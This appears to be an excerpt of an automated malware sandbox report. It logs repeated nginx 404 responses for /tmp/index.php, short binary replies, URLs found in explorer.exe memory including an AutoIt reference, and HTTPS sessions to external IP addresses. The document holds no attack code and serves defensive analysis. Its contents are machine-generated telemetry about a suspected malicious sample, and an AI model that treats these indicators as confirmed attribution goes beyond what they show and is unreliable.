                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 12:59:59 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:01:05 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:01:15 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:01:26 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:01:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:01:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:01:45 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:02:07 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:02:29 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.26.0 | Date: Mon, 07 Oct 2024 13:02:50 GMT | Content-Type: text/html; charset=utf-8 | Connection: close | Data Raw: 03 00 00 00 72 e8 84 | Data Ascii: r
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000002.00000000.2115964908.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2119469337.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000002.00000000.2118897600.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118355378.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2118873758.0000000008870000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
                Source: explorer.exe, 00000002.00000000.2121740943.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2121740943.000000000C81C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: explorer.exe, 00000002.00000000.2121214816.000000000C549000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                Source: explorer.exe, 00000002.00000000.2117666934.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://android.notify.windows.com/iOS
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/
                Source: explorer.exe, 00000002.00000000.2117666934.0000000007637000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: explorer.exe, 00000002.00000000.2116701532.00000000035FA000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.coml
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.com
                Source: explorer.exe, 00000002.00000000.2119469337.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
                Source: explorer.exe, 00000002.00000000.2121214816.000000000C460000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.comcember
                Source: explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/)s
                Source: explorer.exe, 00000002.00000000.2119469337.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.comon
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknown | Network traffic detected: HTTP traffic on port 50013 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknown | Network traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknown | Network traffic detected: HTTP traffic on port 49932 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknown | Network traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49932
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknown | Network traffic detected: HTTP traffic on port 50012 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknown | Network traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50020 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknown | Network traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50030 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknown | Network traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 50029 -> 443
                Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49932 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50012 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50013 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50017 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50018 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50020 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50021 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 188.40.141.211:443 -> 192.168.2.5:50023 version: TLS 1.2
